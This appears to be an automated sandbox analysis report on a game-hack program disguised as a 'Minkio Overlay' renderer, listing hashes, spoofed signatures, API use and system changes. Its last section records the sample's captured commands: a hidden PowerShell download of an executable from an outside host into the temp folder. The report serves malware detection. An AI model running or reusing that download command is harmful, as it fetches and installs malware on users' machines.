PUP.Gamehack.GSO

Analysis Report

General information

Family Name: PUP.Gamehack.GSO
Signature status: No Signature

Known Samples

Sample 1
MD5: a7668609025ed001fad36544c0d4a50a
SHA1: 29f38e796e69b63b639bc1ca1fa28b87d34bdde5
SHA256: 75656681E5CF08D2AF0AD8F3A2BB88A8974C770D94F4BBD16B8DBD7975D2505A
File Size: 749.06 KB, 749056 bytes

Sample 2
MD5: 611362bc4aa194c52db4c95555d2b2b8
SHA1: bfd624709a48b3ddfd1c99500c670323e60545f0
SHA256: 5502060679AB6453EE97C27A07D9BA559061DF4B934C89AD3AD7D201A5D001E6
File Size: 9.64 MB, 9637552 bytes

Sample 3
MD5: 391b4d88bed80c0af1a4b2a82a7fd75f
SHA1: de029ce807430a4c2cd5ed087be9208b80d34e6e
SHA256: 3C040644F07FC00668D94B72AEAC0978496B9D168C6136E75EE3FF6950E4F84D
File Size: 8.50 MB, 8497664 bytes

Sample 4
MD5: f2d1bb13f3a555ba438bc6a1d85f2ac6
SHA1: c29a5e0e0991bc178c214da4ca55417389f2877f
SHA256: C682E74B5228290F5D4E6BFD2FF29B200D601133109FED64271E3866AA4F6C9A
File Size: 5.92 MB, 5924352 bytes

Windows Portable Executable Attributes

  • File doesn't have "Rich" header
  • File doesn't have exports table
  • File doesn't have security information
  • File has exports table
  • File has TLS information
  • File is 64-bit executable
  • File is either console or GUI application
  • File is GUI application (IMAGE_SUBSYSTEM_WINDOWS_GUI)
  • File is Native application (NOT .NET application)
  • File is not packed
  • IMAGE_FILE_DLL is not set inside PE header (Executable)
  • IMAGE_FILE_EXECUTABLE_IMAGE is set inside PE header (Executable Image)

Windows PE Version Information

Company Name: Minkio Software
File Description: Game Overlay Renderer
File Version: 1.4.2.0
Internal Name: MinkioOverlay
Legal Copyright: Copyright (C) 2025 Minkio Software
Original Filename: MinkioExternal.exe
Product Name: Minkio Overlay
Product Version: 1.4.2

Digital Signatures

Signer: Areeb Ahmed Code Signing LLC
Root: Areeb Ahmed Code Signing LLC
Status: Self Signed

Signer: Microsoft Corporation
Root: Microsoft Code Signing PCA 2011
Status: Hash Mismatch

Signer: Microsoft Windows Software Compatibility Publisher
Root: Microsoft Windows Third Party Component CA 2013
Status: Hash Mismatch

File Traits

  • dll
  • HighEntropy
  • imgui
  • ntdll
  • WriteProcessMemory
  • x64

Block Information

Total Blocks: 18,786
Potentially Malicious Blocks: 956
Whitelisted Blocks: 15,075
Unknown Blocks: 2,755

Visual Map

[Per-block classification map: a sequence of 0 / ? / x markers, one per analysed block, truncated in the source]
0 - Probable Safe Block
? - Unknown Block
x - Potentially Malicious Block

Similar Families

  • Gamehack.GSR
  • RobloxHack.LE
  • RobloxStealer.B

Files Modified

File: \device\namedpipe\gmdasllogger
Attributes: Generic Write, Read Attributes

File: \device\namedpipe\pshost.134232212191987039.5588.defaultappdomain.powershell
Attributes: Generic Read, Write Data, Write Attributes, Write extended, Append data, LEFT 524288

File: c:\users\user\appdata\local\temp\__psscriptpolicytest_2hf4aavw.xmg.ps1
Attributes: Generic Write, Read Attributes

File: c:\users\user\appdata\local\temp\__psscriptpolicytest_x4wcpang.hwm.psm1
Attributes: Generic Write, Read Attributes

Registry Modifications

Key::Value: HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe
API Name: RegNtPreCreateKey

Key::Value: HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe
API Name: RegNtPreCreateKey

Key::Value: HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe
API Name: RegNtPreCreateKey

Key::Value: HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe
API Name: RegNtPreCreateKey

Windows API Usage

Category API
Syscall Use
  • ntdll.dll!NtAccessCheck
  • ntdll.dll!NtAddAtomEx
  • ntdll.dll!NtAlertThreadByThreadId
  • ntdll.dll!NtAllocateLocallyUniqueId
  • ntdll.dll!NtAlpcConnectPort
  • ntdll.dll!NtAlpcConnectPortEx
  • ntdll.dll!NtAlpcQueryInformation
  • ntdll.dll!NtAlpcSendWaitReceivePort
  • ntdll.dll!NtApphelpCacheControl
  • ntdll.dll!NtAssociateWaitCompletionPacket
  • ntdll.dll!NtClearEvent
  • ntdll.dll!NtClose
  • ntdll.dll!NtCompareSigningLevels
  • ntdll.dll!NtConnectPort
  • ntdll.dll!NtCreateEvent
  • ntdll.dll!NtCreateFile
  • ntdll.dll!NtCreateIoCompletion
  • ntdll.dll!NtCreateKey
  • ntdll.dll!NtCreateMutant
  • ntdll.dll!NtCreatePrivateNamespace
  • ntdll.dll!NtCreateSection
  • ntdll.dll!NtCreateSemaphore
  • ntdll.dll!NtCreateThreadEx
  • ntdll.dll!NtCreateTimer
  • ntdll.dll!NtCreateTimer2
  • ntdll.dll!NtCreateWaitCompletionPacket
  • ntdll.dll!NtCreateWorkerFactory
  • ntdll.dll!NtDelayExecution
  • ntdll.dll!NtDeviceIoControlFile
  • ntdll.dll!NtDuplicateObject
  • ntdll.dll!NtDuplicateToken
  • ntdll.dll!NtEnumerateKey
  • ntdll.dll!NtEnumerateValueKey
  • ntdll.dll!NtFlushProcessWriteBuffers
  • ntdll.dll!NtFreeVirtualMemory
  • ntdll.dll!NtFsControlFile
  • ntdll.dll!NtGetCachedSigningLevel
  • ntdll.dll!NtMapViewOfSection
  • ntdll.dll!NtNotifyChangeKey
  • ntdll.dll!NtOpenDirectoryObject
  • ntdll.dll!NtOpenEvent
  • ntdll.dll!NtOpenFile
  • ntdll.dll!NtOpenKey
  • ntdll.dll!NtOpenKeyEx
  • ntdll.dll!NtOpenMutant
  • ntdll.dll!NtOpenProcess
  • ntdll.dll!NtOpenProcessToken
  • ntdll.dll!NtOpenProcessTokenEx
  • ntdll.dll!NtOpenSection
  • ntdll.dll!NtOpenSemaphore
  • ntdll.dll!NtOpenSymbolicLinkObject
  • ntdll.dll!NtOpenThread
  • ntdll.dll!NtOpenThreadToken
  • ntdll.dll!NtOpenThreadTokenEx
  • ntdll.dll!NtProtectVirtualMemory
  • ntdll.dll!NtQueryAttributesFile
  • ntdll.dll!NtQueryDebugFilterState
  • ntdll.dll!NtQueryDefaultLocale
  • ntdll.dll!NtQueryDirectoryFileEx
  • ntdll.dll!NtQueryFullAttributesFile
  • ntdll.dll!NtQueryInformationFile
  • ntdll.dll!NtQueryInformationJobObject
  • ntdll.dll!NtQueryInformationProcess
  • ntdll.dll!NtQueryInformationThread
  • ntdll.dll!NtQueryInformationToken
  • ntdll.dll!NtQueryKey
  • ntdll.dll!NtQueryLicenseValue
  • ntdll.dll!NtQueryObject
  • ntdll.dll!NtQueryPerformanceCounter
  • ntdll.dll!NtQuerySecurityAttributesToken
  • ntdll.dll!NtQuerySecurityObject
  • ntdll.dll!NtQuerySymbolicLinkObject
  • ntdll.dll!NtQuerySystemInformation
  • ntdll.dll!NtQuerySystemInformationEx
  • ntdll.dll!NtQueryValueKey
  • ntdll.dll!NtQueryVirtualMemory
  • ntdll.dll!NtQueryVolumeInformationFile
  • ntdll.dll!NtQueryWnfStateData
  • ntdll.dll!NtQueryWnfStateNameInformation
  • ntdll.dll!NtReadFile
  • ntdll.dll!NtReadRequestData
  • ntdll.dll!NtReadVirtualMemory
  • ntdll.dll!NtReleaseMutant
  • ntdll.dll!NtReleaseSemaphore
  • ntdll.dll!NtReleaseWorkerFactoryWorker
  • ntdll.dll!NtRequestWaitReplyPort
  • ntdll.dll!NtResumeThread
  • ntdll.dll!NtSetEvent
  • ntdll.dll!NtSetInformationFile
  • ntdll.dll!NtSetInformationKey
  • ntdll.dll!NtSetInformationObject
  • ntdll.dll!NtSetInformationProcess
  • ntdll.dll!NtSetInformationThread
  • ntdll.dll!NtSetInformationVirtualMemory
  • ntdll.dll!NtSetInformationWorkerFactory
  • ntdll.dll!NtSetSystemInformation
  • ntdll.dll!NtSetTimer2
  • ntdll.dll!NtSetTimerEx
  • ntdll.dll!NtSubscribeWnfStateChange
  • ntdll.dll!NtTerminateProcess

15 additional items are not displayed above.

Process Manipulation Evasion
  • NtUnmapViewOfSection
Anti Debug
  • IsDebuggerPresent
  • NtQuerySystemInformation
User Data Access
  • GetUserDefaultLocaleName
  • GetUserObjectInformation
Process Shell Execute
  • CreateProcess
Process Terminate
  • TerminateProcess
Encryption Used
  • BCryptOpenAlgorithmProvider
  • CryptAcquireContext
Other Suspicious
  • AdjustTokenPrivileges

Shell Command Execution

C:\WINDOWS\system32\cmd.exe cmd.exe /c powershell -WindowStyle Hidden -Command "& { iwr -Uri 'https://vcc-library.uk/Stb/Retev.php?bl=9UHkJuvH1q5iXCdVrZDSW01.txt' -OutFile $env:TEMP\BK288768.exe
C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "& { iwr -Uri 'https://vcc-library.uk/Stb/Retev.php?bl=9UHkJuvH1q5iXCdVrZDSW01.txt' -OutFile $env:TEMP\BK288768.exe
